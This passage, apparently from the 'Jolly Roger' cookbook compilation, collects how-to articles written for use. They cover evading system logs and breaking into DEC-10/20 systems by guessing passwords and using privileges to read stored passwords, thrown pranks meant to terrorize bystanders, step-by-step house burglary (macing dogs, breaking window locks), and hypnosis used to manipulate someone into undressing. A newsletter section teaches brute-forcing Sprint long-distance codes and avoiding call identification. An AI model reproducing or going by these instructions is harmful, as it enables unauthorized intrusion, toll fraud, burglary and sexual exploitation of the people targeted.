any commands that require them! All, yes all, systems aregoing to be keeping log files of what users are doing, and that willshow up. It is just like dropping a trouble-card in an ESS system,after sending that nice operator a pretty tone.Spend no excessive amounts of time on the account in one stretch.Keep your calling to the very late night ifpossible, or duringbusiness hours (believe it or not!). It so happensthat there are more users on during business hours, and it is verydifficult to read a log file with 60 users doing many commnds every minute.Try to avoid systems where everyone knows each other, don't try to bluff.And above all: never act like you own the system, or are the best thereis. They always grab the people who's heads swell... There is some veryinteresting front end equipment around nowadays, but first let'sdefine terms... By front end, we mean any device that you mustpass thru to get at the real computer. There are devices that are made todefeat hacker programs, and just plain old multiplexers.To defeat hacker programs, there are now devices that pick up the phoneand just sit there... This means that your device gets no carrier,thus you think there isn't a computer on the other end. Theonly way around it is to detect when it was picked up. If it pickes upafter the same number ring, then you know it is a hacker-defeater.These devices take a multi-digit code to let you into the system.Some are, in fact, quite sophisticated to the point where itwill also limit the user name's down, so only one name or set of namescan be valid logins after they input the code... Other devices input anumber code, and then they dial back a pre-programmed number for that code.These systems are best to leave alone,because they know someone is playing with their phone. You may think "buti'll just reprogram the dial-back." Think again, how stupid that is...Then they have your number, or a test loop if you were just a littlesmarter. If it's your number, they have your balls (if male...),
If its a loop, then you are screwed again, since those loopsare *monitored*. As for multiplexers... What a plexer is supposedto do is this:The system can accept multiple users. We have to time share, so we'll letthe front-end processor do it... Well, this is what a multiplexer does.Usually they will ask for something like "enter class" or "line:". Usuallyit is programmed for a double digit number, or a four to five letter word.There are usually a few sets of numbers it accepts, but those numbers alsoset your 300/1200/2400 baud data type.These multiplexers are inconvenient at best, so not to worry. A littleabout the history of hacking: hacking, by my definition, means a greatknowledge of some special area. Doctors and lawyersare hackers of a sort, by this definition. But most often, it isbeing used in the computer context, and thus we have a definition of"anyone who has a great amount of computer or telecommunicationsknowledge." You are not a hacker because you have a list of codes...Hacking, by my definition, has then been around only about 15 years.It started, where else but, mit and colleges where they had computerscience or electrical engineering departments.Hackers have created some of the best computer languages, themost awesome operating systems, and even gone on to make millions.Hacking used to have a good name, when we could honestly say"we know what we are doing". Now it means (in the public eye):the 414's, ron austin, the nasa hackers, the arpanet hackers...All the people who have been caught,have done damage, and are now going to have to face fines and sentences.Thus we come past the moralistic crap, and to our purpose: educate thehacker community, return to the days when people actually knew something...
--------------Jolly Roger
Hacking DEC's by the Jolly Roger
In this article you will learn how to log in to dec's, logging out, and allthe fun stuff to do in-between. All of this information is based on astandard dec system.Since there are dec systems 10 and 20, and I favor, the dec 20,there will be more info on them in this article. It just so happensthat the dec 20 is also the more common of the two, and is used by muchmore interesting people (if you know what I mean...) Ok, the first thingyou want to do when you are receiving carrier from a dec system is to findout the format of login names. You can do this by looking at who is on thesystem.Dec=> ` (the 'exec' level prompt)you=> sysy is short for sy(stat) and shows you the system status.You should see the format of login names...A systat usually comes up in this form:job line program userjob: the job number (not important unless you want to log them off later)line: what line they are on (used to talk to them...)These are both two or three digit numbers.Program: what program are they running under? If it says 'exec'they aren't doing anything at all...User: ahhhahhhh! This is the user name they are logged in under...Copy the format, and hack yourself outa working code... Login format is assuch:
dec=> `you=> login username passwordusername is the username in the format you saw above in the systat.After you hit the space after your username, it will stop echoingcharacters back to your screen. This is the password you are typing in...Remember, people usually use their name, their dog's name, the name of afavorite character in a book, or something like this. A few cleverpeople have it set to a key cluster (qwerty or asdfg). Pw's can be from 1to 8 characters long, anything after that is ignored. You are finally in...It would be nice to have a little help, wouldn't it? Just type a ? Or theword help, and it will give you a whole list of topics...Some handy characters for you to know would be the control keys,wouldn't it? Backspace on a dec 20 is rub which is 255 on your ascii chart.On the dec 10 it is cntrl-h. To abort a long listing or a program,cntrl-c works fine. Use cntrl-o to stop long output to the terminal.This is handy when playing a game, but you don't want to cntrl-c out.Cntrl-t for the time. Cntrl-u will kill the whole line you are typing atthe moment. You may accidently run a program where the only way out isa cntrl-x, so keep that in reserve. Cntrl-s to stop listing, cntrl-q tocontinue on both systems. Is your terminal having trouble??Like, it pauses for no reason, or it doesn't backspace right? This isbecause both systems support many terminals, and you haven't told it whatyours is yet... You are using a vt05so you need to tell it you are one.Dec=> `you=> information terminalor...You=> infothis shows you what your terminal is set up as...Dec=>all sorts of shit, then the `you=> set ter vt05 this sets your terminaltype to vt05.Now let's see what is in the account (here after abbreviated acct.)that you have hacked onto... Say=> dirshort for directory, it showsyou what the user of the code has save to the disk. There should be aformatlike this: xxxxx.Oooxxxxx is the file name, from 1 to 20 characterslong. Ooo is the file type, one of: exe, txt, dat, bas, cmd and a fewothers that are system dependant.Exe is a compiled program that can be run (just by typing its name at the`).Txt is a text file, which you can see bytyping=>type xxxxx.TxtDo not try to=>type xxxxx.Exe this is very bad for your terminal and will tell youabsolutly nothing.Dat is data they have saved.Bas is a basic program, you can have it typed out for you.Cmd is a command type file, a little toocomplicated to go into here.Try =>take xxxxx.CmdBy the way, there are other users out there who may have files you can use(gee, why else am I here?).Type => dir <*.*> (Dec 20)
=> dir [*,*] (dec 10)* is a wildcard, and will allow you to access the files on other accountsif the user has it set for public access. If it isn't set for publicaccess,then you won't see it. To run that program:dec=> `you=> username program-nameusername is the directory you saw thefile listed under, and file name waswhat else but the file name?** You are not alone **remember, you said (at the very start) sy short for systat,and how we said this showed the other users on the system? Well, youcan talk to them, or at least send a message to anyone you see listed in asystat. You can do this by:dec=> the user list (from your systat)you=> talkusername (dec 20) send username (dec 10)talk allows you and them immediate transmission of whatever you/they typeto be sent to the other. Send only allow you one message to be sent, andsend, they will send back to you, with talk you can just keep going. By theway, you may be noticing with the talk command that what you type is stillacted upon by the parser (control program). To avoid the constant errormessages type either:you=> ;your messageyou=> rem your messagethe semi-colon tells the parser that what follows is just a comment. Remis short for 'remark' and ignores you from then on until you type a cntrl-zor cntrl-c, at which point it puts you back in the exec mode. To break theconnection from a talk command type:you=> break priv's:if you happen to have privs, you can do all sorts of things.First of all, you have to activate those privs.You=> enablethis gives you a $ prompt, and allows you to do this:whatever you can do to your own directory you can now do to anyother directory. To create a new acct. Using your privs, just type=>build usernameif username is old, you can edit it, if it is new, you candefine it to be whatever you wish. Privacy means nothing to a user withprivs. By the way, there are various levels of privs: operator, wheel,cia.wheel is the most powerful, being that he can log in from anywhere andhave his powers.Operators have their power because they are at a special terminalallowing them the privs. Cia is short for 'confidential informationaccess', which allows you a low level amount of privs.Not to worry though, since you can read the system log file, which alsohas the passwords to all the other accounts.To de-activate your privs, typeyou=> disablewhen you have played your greedy heart out, you can finally leave thesystem with the command=>logoutthis logs the job you are using off the system (there may be varientsof this such as kjob, or killjob).
----------------Jolly Roger
Harmless Bombs by the Jolly Roger
To all those who do not wish to inflict bodily damage on their victimsbut only terror.These are weapons that should be used from high places.1) The flour bomb.Take a wet paper towel and pour a given amount of baking flour inthe center. Then wrap it up and put on a rubber band to keep ittogether. When thrown it will fly well but when it hits, it coversthe victim with the flower or causes a big puff of flour which willput the victim in terror since as far as they are concerned, somestrange white powder is all over them. This is a cheap method ofterror and for only the cost of a roll of paper towels and a bag offlour you and your friends can have loads of fun watching peopleflee in panic.2) Smoke bomb projectile.All you need is a bunch of those little round smoke bombs and awrist rocket or any sling-shot. Shoot the smoke bombs and watch theterror since they think it will blow up!3) Rotten eggs (good ones)Take some eggs and get a sharp needleand poke a small hole in the top of each one.Then let them sit in a warm place for about a week. Then you've got abunch of rotten eggs that will only smell when they hit.4) Glow in the dark terror.Take one of those tubes of glow in the dark stuff and pour thestuff on whatever you want to throw and when it gets on the victim,they think it's some deadly chemical or a radioactive substance sothey run in total panic. This works especially well with flowerbombs since a gummy, glowing substance gets all over the victim.5) Fizzling panic.Take a baggie of a water-baking soda solution and seal it. (Makesure there is no air in it since the solution will form a gas andyou don't want it to pop on you.) Then put it in a bigger plasticbag and fill it with vinegar and seal it. When thrown, the twosubstances will mix and cause a violently bubbling substance to goall over the victim. ---------------Jolly Roger
Breaking Into Houses by the Jolly Roger
Okay You Need:1. Tear Gas or Mace2. A BB/Pelet Gun3. An Ice Pick4. Thick Gloves
What You Do Is:
1. Call the ###-#### of the house, or ring doorbell, To find out if they're home.2. If they're not home then...3. Jump over the fence or walk through gate (whatever).4. If you see a dog give him the mace or tear gas.5. Put the gloves on!!!!!!!6. Shoot the BB gun slightly above the window locks.7. Push the ice-pick through the hole (made by the BB gun).8. Enter window.
9. FIRST...Find the LIVING ROOM. (they're neat things there!).10. Then goto the Bed-room to get a pillow case. Put the goodies in the pillow case.11. Get out <-* FAST! -*>
Notes: You should have certian targets worked out (like computers,Radios, Ect.,Ect.). Also <-* NEVER *-> Steal from your ownneigborhood. If you think they have an alarm...<-* FORGET IT! *->.
---------------Jolly Roger
A Guide to Hypnotism Courtesy of the Jolly Roger (Originally an Apple ][ file, forgive the uppercase!)
+-------------------+! WHAT HYPNOTISM IS !+-------------------+
HYPNOTISM, CONTRARY TO COMMON BELEIF, IS MERELY STATE WHEN YOUR MIND ANDBODY ARE IN A STATE OF RELAXATION AND YOUR MIND IS OPEN TO POSITIVE, ORCLEVERLY WORDED NEGATIVE, INFLUENCES. IT IS NOT A TRANCE WHERE YOU: > ARE TOTALLY INFLUENCABLE. > CANNOT LIE. > A SLEEP WHICH YOU CANNOT WAKE UP FROM WITHOUT HELP.THIS MAY BRING DOWN YOUR HOPE SOMEWHAT, BUT, HYPNOTISM IS A POWERFUL FORSELF HELP, AND/OR MISCHEIF.
+-----------------------+! YOUR SUBCONCIOUS MIND !+-----------------------+
BEFORE GOING IN FURTHER, I'D LIKE TO STATE THAT HYPNOTISM NOT ONLY ISGREAT IN THE WAY THAT IT RELAXES YOU AND GETS YOU (IN THE LONG RUN) WHATYOU WANT, BUT ALSO THAT IT TAPS A FORCE OF INCREDIBLE POWER, BELEIVE IT ORNOT, THIS POWER IS YOUR SUBCONCIOUS MIND.THE SUBCONCIOUS MIND ALWAYS KNOWS WHAT IS GOING ON WITH EVERY PART OF YOURBODY,EVERY MOMENT OF THE DAY. IT PROTECTS YOU FROM NEGATIVE INFLUENCES,AND RETAINS THE POWER TO SLOW YOUR HEARTBEAT DOWN AND STUFF LIKE THAT.THE SUBCONCIOUS MIND HOLDS JUST ABOUT ALL THE INFO YOU WOULD LIKE TO KNOWABOUT YOURSELF, OR, IN THIS CASE, THE PERSON YOU WILL BE HYPNOTISING.THERE ARE MANY WAYS TO TALK TO YOUR SUBCONCIOUS AND HAVE IT TALK BACK TOYOU. ONE WAY IS THE OUJA BOARD, NO ITS NOT A SPIRIT, MERELY THEMINDS OF THOSE WHO ARE USING IT. ANOTHER, WHICH I WILL DISCUSS HERE,IS THE PENDULUM METHOD. OK, HERE IS HOW IT GOES.FIRST, GET A RING OR A WASHER AND TIE IT TO A THREAD A LITTLE LONGER THANHALF OF YOUR FOREARM. NOW, TAKE A SHEET OF PAPER AND DRAW A BIG CIRCLE INIT. IN THE BIG CIRCLE YOU MUST NOW DRAW A CROSSHAIR (A BIG +). NOW, PUTTHE SHEET OF PAPER ON A TABLE. NEXT, HOLD THE THREAD WITH THE RING ORWASHER ON IT AND PLACE IT (HOLDING THE THREAD SO THAT THE RING IS 1 INCHABOVE THE PAPER SWINGING) IN THE MIDDLE OF THE CROSSHAIR. NOW, SWINGTHE THREAD SO THE WASHER GOES UP AND DOWN, SAY TO YOURSELF THE WORD "YES"NOW, DO IT SIDE TO SIDE AND SAY THE WORD "NO".DO IT COUNTER CLOCKWISE AND SAY "I DON'T KNOW".AND LASTLY, DO IT CLOCKWISE AND SAY "I DONT WANT TO SAY." NOW, WITH THETHREAD BACK IN THE MIDDLE OF THE CROSSHAIR, ASK YOURSELF QUESTIONS AND
WAIT FOR THE PENDULUM TO SWING IN THE DIRECTION FOR THE ANSWER. (YES, NO,I DONT KNOW OR I DONT WANNA SAY...). SOON, TO YOUR AMAZEMENT, IT WILL BEANSWERING QUESTIONS LIKE ANYTHING... LET THE PENDULUM ANSWER, DONT TRY..WHEN YOU TRY YOU WILL NEVER GET AN ANSWER. LET THE ANSWER COME TO YOU.
+-------------------------+! HOW TO INDUCE HYPNOTISM !+-------------------------+
NOW THAT YOU KNOW HOW TO TALK TO YOUR SUBCONCIOUS MIND, I WILL NOW TELL YOUHOW TO GUIDE SOMEONE INTO HYPNOSIS. NOTE THAT I SAID GUIDE, YOU CAN NEVER,HYNOTISE SOMEONE, THEY MUST BE WILLING. OK, THE SUBJECT MUST BE LYING ORSITTING IN A COMFORTABLE POSITION, RELAXED, AND AT A TIME WHEN THINGS ARENTGOING TO BE INTERRUPTED.TELL THEM THE FOLLOWING OR SOMETHING CLOSE TO IT, IN A PEACEFUL, MONOTINOUSTONE (NOT A COMMANDING TONE OF VOICE)
NOTE: LIGHT A CANDLE AND PLACE IT SOMEWHERE WHERE IT CAN BE EASILY SEEN.
TAKE A DEEP BREATH THROUGH YOUR NOSE AND HOLD IT IN FOR A COUNT OF 8. NOW,THROUGH YOUR MOUTH, EXHALE COMPLETELY AND SLOWLY. CONTINUED BREATHING LONG,DEEP, BREATHS THROUGH YOUR NOSE AND EXHALING THROUGH YOUR MOUTH. TENSE UPALL YOUR MUSCLES VERY TIGHT, NOW, COUNTING FROM TEN TO ONE, RELEASE THEMSLOWLY, YOU WILL FIND THEM VERY RELAXED. NOW, LOOK AT THE CANDLE, ASYOU LOOK AT IT, WITH EVERY BREATH AND PASSING MOMEMENT, YOU ARE FEELINGINCREASINGLY MORE AND MORE PEACEFUL AND RELAXED. THE CANDLES FLAME ISPEACEFUL AND BRIGHT.AS YOU LOOK AT IT I WILL COUNT FROM 100 DOWN, AS A COUNT, YOUR EYES WILLBECOME MORE AND MORE RELAXED, GETTING MORE AND MORE TIRED WITH EACHPASSING MOMENT."NOW, COUNT DOWN FROM 100, ABOUT EVERY 10 NUMBERS SAY "WHEN I REACH XX YOUREYES (OR YOU WILL FIND YOUR EYES) ARE BECOMING MORE AND MORE TIRED." TELLTHEM THEY MAY CLOSE THEIR EYES WHENEVER THEY FEEL LIKE IT. IF THE PERSONSEYES ARE STILL OPEN WHEN YOU GET TO 50 THEN INSTEAD OF SAYING"YOUR EYES WILL.."SAY "YOUR EYES ARE...".WHEN THEIR EYES ARE SHUT SAY THE FOLLOWING. AS YOU LIE (OR SIT) HERE WITHYOUR EYES COMFORTABLY CLOSE YOU FIND YOURSELF RELAXING MORE ANDMORE WITH EACH MOMENT AND BREATH.THE RELAXATION FEELS PLEASANT AND BLISSFUL SO, YOU HAPPILY GIVE WAY TOTHIS WONDERFUL FEELING. IMAGINGE YOURSELF ON A CLOUD, RESTING PEACEFULLY,WITH A SLIGHT BREEZE CARESSING YOUR BODY. A TINGLING SENSASION BEGINSTO WORK ITS WAY, WITHIN AND WITHOUT YOUR TOES, IT SLOWLY MOVES UP YOURFEET, MAKING THEM WARM, HEAVY AND RELAXED. THE CLOUD IS SOFT AND SUPPORTSYOUR BODY WITH ITS SOFT TEXTURE, THE SCENE IS PEACEFUL AND ABSORBING,THE PEACEFULNESS ABSORBS YOU COMPLETELY...THE TINGLING GENTLY AND SLOWLY MOVES UP YOUR LEGS, RELAXING THEM.MAKING THEM WARM AND HEAVY. THE RELAXATION FEELS VERY GOOD, IT FEELS SOGOOD TO RELAX AND LET GO. AS THE TINGLING CONTINUES ITS JOURNEY UP INTOYOUR SOLAR PLEXUS, YOU FEEL YOUR INNER STOMACH BECOME VERY RELAXED. NOW,IT MOVES SLOWLY INTO YOUR CHEST, MAKING YOUR BREATHING RELAXED AS WELL.THE FEELING BEGINS TO MOVE UP YOUR ARMS TO YOUR SHOULDERS, MAKING YOUR ARMSHEAVY AND RELAXED AS WELL. YOU ARE AWARE OF THE TOTAL RELAXATION YOU ARENOW EXPERIENCING, AND YOU GIVE WAY TO IT. IT IS GOOD AND PEACEFUL, THETINGLING NOW MOVEVES INTO YOUR FACE AND HEAD, RELAXING YOUR JAWS, NECK, ANDFACIAL MUSCLES, MAKING YOUR CARES AND WORRIES FLOAT AWAY. AWAY INTO THEBLUE SKY AS YOU REST BLISFUlLY ON THE CLOUD....IF THEY ARE NOT RESPONSIVE OR YOU THINK THEY (HE OR SHE..) IS GOING TO
SLEEP, THEN ADD IN A "...ALWAYS CONCENTRATING UPON MY VOICE, INGORING ALLOTHER SOUNDS. EVEN THOUGH OTHER SOUNDS EXSIST, THEY AID YOU IN YOURRELAXATION..." THEY SHOULD SOON LET OUT A SIGH AS IF THEY WERE LETTING GO,AND THEIR FACE SHOULD HAVE A "WOODENESS" TO IT, BECOMING FEATURLESS... NOW,SAY THE FOLLOWING ".... YOU NOW FIND YOURSELF IN A HALLWAY, THE HALLWAY ISPEACEFUL AND NICE. AS I COUNT FROM 10 TO 1 YOU WILL IMAGINE YOURSELFWALKING FURTHER AND FURTHER DOWN THE HALL. WHEN I REACH ONE YOU WILL FINDYOURSELF WHERE YOU WANT TO BE, IN ANOTHER, HIGHER STATE OF CONCIOUS ANDMIND. (COUNT FROM TEN TO ONE)....." DO THIS ABOUT THREE OR FOUR TIMES.THEN, TO TEST IF THE SUBJECT IS UNDER HYPNOSIS OR NOT, SAY...."...YOU FEEL A STRANGE SENSATION IN YOUR (ARM THEY WRITE WITH) ARM, THEFEELING BEGINS AT YOUR FINGERS AND SLOWLY MOVES UP YOUR ARM, AS IT MOVESTHROUGH YOUR ARM YOUR ARM BECOMES LIGHTER AND LIGHTER, IT WILL SOON BE SOLIGHT IT WILL ..... BECOMING LIGHTER AND LIGHTER WHICH EACH BREATH ANDMOMENT..."THEIR FINGERS SHOULD BEGIN TO TWITCH AND THEN MOVE UP, THE ARM FOLLOWING,NOW MY FRIEND, YOU HAVE HIM/HEP IN HYPNOSIS. THE FIRST TIME YOU DO THIS,WHILE HE/SHE IS UNDER SAY GOOD THINGS, LIKE: "YOUR GOING TO FEEL GREATTOMORROW" OR "EVERY DAY IN EVERY WAY YOU WILL FIND YOURSELF BECOMING BETTERAND BETTER".. OR SOME CRAP LIKE THAT... THE MORE THEY GO UNDER, THE DEEPERIN HYPNOSIS THEY WILL GET EACH TIME YOU DO IT.
+----------------------------+! WHAT TO DO WHEN HYPNOTISED !+----------------------------+
WHEN YOU HAVE THEM UNDER YOU MUST WORD THINGS VERY CAREFULLY TO GET YOURWAY. YOU CANNOT SIMPLY SAY... TAKE OFF YOUR CLOTHES AND FUCK THE PILLOW.NO, THAT WOULD NOT REALLY DO THE TRICK. YOU MUST SAY SOMETHING LIKE...."YOU FIND YOUR SELF AT HOME, IN YOUR ROOM AND YOU HAVE TO TAKE A SHOWER(VIVIDLY DESCRIBE THEIR ROOM AND WHATS HAPPENING), YOU BEGIN TO TAKE OFFYOUR CLOTHES..." NOW, IT CANT BE THAT SIMPLE, YOU MUST KNOW THE PERSONSHOUSE, ROOM, AND SHOWER ROOM. THEN DESCRIBE THINGS VIVIDLY AND TELL THEMTO ACT IT OUT (THEY HAVE TO BE DEEPLY UNDER TO DO THIS...). I WOULD JUSTSUGGEST THAT YOU EXPERIMENT A WHILE, AND GET TO KNOW HO; TO DO THINGS.
+-----------+! WAKING UP !+-----------+
WAKING UP IS VERY EASY, JUST SAY.. "...AS I COUNT FROM 1 TO 5 YOU WILLFIND YOURSELF BECOMMING MORE AND MORE AWAKE, MORE AND MORE LIVELY. WHENYOU WAKE UP YOU WILL FIND YOURSELF COMPLETELY ALIVE, AWAKE, AND REFRESHED.MENTALLY AND PHYSICALLY, REMEMBERING THE PLEASANT SENSATION THAT HYPNOSISBRINGS... WAKING UP FEELING LIKE A NEW BORN BABY, REBORN WITH LIFE ANDVIGOR, FEELING EXCELLENT. REMEMBERING THAT NEXT TIME YOU ENTER HYPNOSIS ITWILL BECOME AN EVER INCREASING DEEPER AND DEEPER STATE THAN BEFORE.1- YOU FEEL ENERGY COURSE THROUGHOUT YOUR LIMBS.2- YOU BEGIN TO BREATHE DEEPLY, STIRRING.3- BEGINING TO MOVE MORE AND MORE YOUR EYES OPEN, BRINGING YOU UP TOFULL CONCIOUS.4- YOU ARE UP,UP, UP AND AWAKENING MORE AND MORE.5- YOU ARE AWAKE AND FEELING GREAT."
AND THATS IT! YOU NOW KNOW HOW TO HYPNOTISE YOURSELF AND SOMEONE ELSE.YOU WILL LEARN MORE AND MORE AS YOU EXPERIMENT.
------------------Jolly Roger
‡########################################################################### ## The Remote Informer ## ##------------------------------------------------------------------------## Reader supported newsletter for the underworld ##------------------------------------------------------------------------## ## Editors: Tracker and Norman Bates ## ##========================================================================## September 1987 Issue: 01 ##========================================================================## The Headlines ##------------------------------------------------------------------------## 1) Introduction ## 2) Hacking Sprint: The Easy Way ## 3) Rumors: Why spread them? ## 4) The New Sprint FON Calling Cards ## 5) Automatic Number Identifier (ANI) ###########################################################################
Introduction--------------------------------------------------------------------------Welcome to the first issue of 'The Remote Informer'! This newsletteris reader supported. If the readers of this newsletter do not helpsupport it, then it will end. We are putting this out to help out theones that would like to read it. If you are one of those who thinks theyknow everything, then don't bother reading it. This newsletter is notanything like the future issues. The future issues will contain severalsections, as long as reader input is obtained. Below is an outlineoverview of the sections in the future issues.
I/O Board (Input/Output Board)
The I/O Board is for questions you have, that we might be able toanswer or atleast refer you to someone or something. We will be honest ifwe cannot help you. We will not make up something, or to the effect, justto make it look like we answered you. There will be a section in the I/OBoard for questions we cannot answer, and then the readers will have theopportunity to answer it. We will print anything that is reasonable inthe newsletter, even complaints if you feel like you are better thaneveryone.
NewsCenter
This section will be for news around the underworld. It will talk ofbusts of people in the underworld and anything else that would beconsidered news. If you find articles in the paper, or something happensin your local area, type it up, and upload it to one of the boards listedat the end of the newsletter. Your handle will be placed in the article.If you do enter a news article, please state the date and from where yougot it.
Feature Section
The Feature Section will be the largest of the sections as it will beon the topic that is featured in that issue. This will be largely reader
input which will be sent in between issues. At the end of the issue athand, it will tell the topic of the next issue, therefore, if you havesomething to contribute, then you will have ample time to prepare yourarticle.
Hardware/Software ReviewIn this section, we will review the good and bad points of hardwareand software related to the underworld. It will be an extensive review,rather than just a small paragraph.
The Tops
This section will be the area where the top underworld BBS's, hackingprograms, modem scanners, etc. will be shown. This will be readerselected and will not be altered in anyway. The topics are listed below.Underworld BBS's (Hack, Phreak, Card, Anarchy, etc.)Hacking programs for Hayes compatablesHacking programs for 1030/Xm301 modemsModem scanners for Hayes compatablesModem scanners for 1030/Xm301 modemsOther type illegal programsYou may add topics to the list if enough will support it.
Tid Bits
This will contain tips and helpful information sent in by the users.If you have any information you wish to contribute, then put it in a textfile and upload it to one of the BBS's listed at the end of thenewsletter.Please, no long distance codes, mainframe passwords, etc.We may add other sections as time goes by. This newsletter will notbe put out on a regular basis. It will be put out when we have enougharticles and information to put in it. There may be up to 5 a month, butthere will always be at least one a month. We would like you, the readers,to send us anything you feel would be of interest to others, like hackinghints, methods of hacking long distance companies, companies to card from,etc. We will maintain the newsletter as long as the readers support it.That is the end of the introduction, but take a look at this newsletter,as it does contain information that may be of value to you.========================================================================== Hacking Sprint: The Easy Way------------------------------------------------------------------------- By: Tracker
If you hack US Sprint, 950-0777 (by the way it is no longer GTESprint), and you are fustrated at hacking several hours only to find oneor two codes, then follow these tips, and it will increase your resultstremendously. First, one thing that Mr. Mojo proved is that Sprint willnot store more than one code in every hundred numbers. (ex: 98765400 to98765499 may contain only one code). There may NOT be a code in thathundred, but there will never be more than one.Sprint's 9 digit codes are stored from 500000000 through 999999999.In the beginning of Sprint's 950 port, they only had 8 digit codes. Thenthey started converting to 9 digit codes, storing all 8 digit codesbetween 10000000 and 49999999 and all 9 digit codes between 500000000 and999999999. Sprint has since cancelled most 8 digit codes, although thereare a few left that have been denoted as test codes. Occaisionally, Ihear of phreaks saying they have 8 digit codes, but when verifying them,
the codes were invalid.Now, where do you start? You have already narrowed the low and highnumbers in half, therefore already increasing your chances of good resultsby 50 percent. The next step is to find a good prefix to hack. By theway, a prefix, in hacking terms, is the first digits in a code that can beany length except the same number of digits the code is. (ex: 123456789is a code. That means 1, 12, 123, 1234, 12345, 123456, 1234567, and12345678 are prefixes) The way you find a good prefix to hack is tomanually enter a code prefix. If when you enter the code prefix and avalid destination number and you do not hear the ringing of the recordingtelling you that the code is invalid until near the end of the number,then you know the prefix is valid. Here is a chart to follow when doingthis:Code - Destination Range good codes exist-------------------------------------------------123456789 - 6192R 123400000 - 123499999123456789 - 619267R 123450000 - 123459999123456789 - 61926702R 123456000 - 123456999123456789 - 6192670293R 123456700 - 123456799-------------------------------------------------( R - Denotes when ring for recording starts)To provethis true, I ran a test using OmniHack 1.3p, written byJolly Joe. In this test I found a prefix where the last 3 digits were allI had to hack. I tested each hundred of the 6 digit prefix finding thatall but 4 had the ring start after the fourth digit was dialed in thedestination number. The other four did not ring until I had finished theentire code. I set OmniHack to hack the prefix + 00 until prefix + 99.(ex: xxxxxxy00 to xxxxxxy99: where y is one of the four numbers that thering did not start until the dialing was completed.) Using this method, Ifound four codes in a total of 241 attempts using ascending hacking (AKA:Sequential). Below you will see a record of my hack:Range of hack Codes found Tries----------------------------------------------xxxxxx300 - xxxxxx399 xxxxxx350 50xxxxxx500 - xxxxxx599 xxxxxx568 68xxxxxx600 - xxxxxx699 xxxxxx646 46xxxxxx800 - xxxxxx899 xxxxxx877 77----------------------------------------------Totals 4 codes 241As you see, these methods work. Follow these guidlines and tips andyou should have an increase in production of codes in the future hackingSprint. Also, if you have any hints/tips you think others could benefitfrom, then type them up and upload them to one of the boards at the end ofthe newsletter.========================================================================== Rumors: Why Spread Them?-------------------------------------------------------------------------- By: TrackerDo you ever get tired of hearing rumors? You know, someone gets anurge to impress others, so they create a rumor that some long distancecompany is now using tracing equipment. Why start rumors? It only scaresothers out of phreaking, and then makes you, the person who started therumor, look like Mr. Big. This article is short, but it should make youaware of the rumors that people spread for personal gain. The best thingto do is to denote them as a rumor starter and then leave it at that. Youshould not rag on them constantly, since if the other users cannotdetermine if it is fact or rumor, then they should suffer the
consequences.========================================================================== The New Sprint FON Calling Cards-------------------------------------------------------------------------- By: TrackerUS Sprint has opened up a new long distance network called the FiberOptic Network (FON), in which subscribers are given calling cards. Thesecalling cards are 14 digits, and though, seem randomly generated, they areactually encrypted. The rumors floating around about people gettingcaught using the Sprint FON calling cards are fact, not rumors. Thereason people are getting caught is that they confuse the FON callingcards with the local 950 port authorization codes. If you will remember,you never use AT&T calling cards from you home phone. It has ANIcapability, which is not tracing, but rather the originating phone numberis placed on the bill as soon as the call is completed. They know yourphone number when you call the 800 access port, but they do not record ituntil your call is completed. Also, through several of my hacks, I cameup with some interesting information surrounding the new Sprint network.They are listed below.800-877-0000This number is for information on US Sprint's 800 calling cardservice. I have not played around with it, but I believe it is fortrouble or help with the FON calling cards. I am not sure if it is forsubscribing to the FON network.800-877-0002 - You hear a short tone, then nothing.800-877-0003 - US Sprint Alpha Test Channel #1800-877-(0004-0999)When you call these numbers, you get a recording saying: "Welcome toUS Sprint's 1 plus service." When the recording stops, if you hit thepound key (#) you will get the calling card dial tone.Other related Sprint numbers800-521-4949 This is the number that you subscribe to US Sprint with.You may also subscribe to the FON network on this number. It will take 4to 5 weeks for your calling card to arrive.10777This is US Sprint's equal access number. When you dial this number,you then dial the number you are calling, and it will be billed through USSprint, and you will receive their long distance line for that call. Notethat you will be billed for calls made through equal access. Do notmistake it to be a method of phreaking, unless used from a remotelocation.If you are in US Sprint's 1+ service then call 1+700-555-1414, whichwill tell you which long distance company you are using. When you hear:"Thank you for choosing US Sprint's 1 plus service," hit the pound key(#), and then you will get the US Sprint dial tone. This however is justthe same as if you are calling from your home phone if you dial direct, soyou would be billed for calls made through that, but there are ways to usethis to your advantage as in using equal access through a PBX.========================================================================== Automatic Number Identification (ANI)-------------------------------------------------------------------------- By: Tracker
The true definition for Automatic Number Identification has not beenwidely known to many. Automatic Number Identification, (AKA: ANI), is theprocess of the destination number knowing the originating number, which iswhere you are calling from. The method of achieving this is to send thephone number that you are calling from in coded form ahead of the
destination number. Below is an example of this.ANI MethodDial: 267-0293Sent: ********2670293* - Denotes the originating number which is coded and sent before the numberAs you noticed there are 8 digits in the coded number. This isbecause, at least I believe, it is stored in a binary-like form.Automatic Number Identification means a limited future in phreaking. ANIdoes not threaten phreaking very much yet, but it will in the near future.A new switching system will soon be installed in most cities that arecovered by ESS, Electronic Switching System, now.The system will have ANI capabilities which will be supplied to theowners of phone lines as anð ðadded extra. The owner's phone will havean LED read-out that will show the phone number of the people thatcall you. You will be able to block some numbers, so that peoplecannot call you. This system is in the testing stages currently, but willsoon be installed across most of the country. As you see, this willend a large part of phreaking, until we, the phreakers, can come up withan alternative. As I have been told by several, usually reliable,people, this system is called ISS, which I am not sure of the meaning ofthis, and is being tested currently in Rhode Island.800 in-watts lines set up by AT&T support ANI. The equipment todecode an ANI coded origination number does not costs as much as you wouldexpect. 950 ports do not offer ANI capability, no matter what you havebeen told. The 950 ports will only give the city in which they are based,this usually being the largest in the state, sometimes the capitol.One last thing that I should tell you is that ANI is not related totracing. Tracing can be done on any number whether local, 950, etc. Oneway around this, especially when dialing Alliance TeleConferencing, is todial through several extenders or ports. ANI will only cover the numberthat is calling it, and if you call through a number that does not supportANI, then your number will never be known.========================================================================== The Disclaimer!--------------------------------------------------------------------------
We, the editors, take no responsibility for your actions and use ofthe information in this newsletter. This newsletter is for informationalpurposes only. There will never be any long distance codes, passwords,etc. in this newsletter. If you are easily offended by telecommunicationdiscussions, then we suggest that you not read this newsletter. But forthose who are truely interested in the information in this newsletter,enjoy it.
Brought to you in Cookbook, courtesy of the Jolly Roger!!!!!!!!!!
Jackpotting ATM Machines courtesy of the Jolly Roger
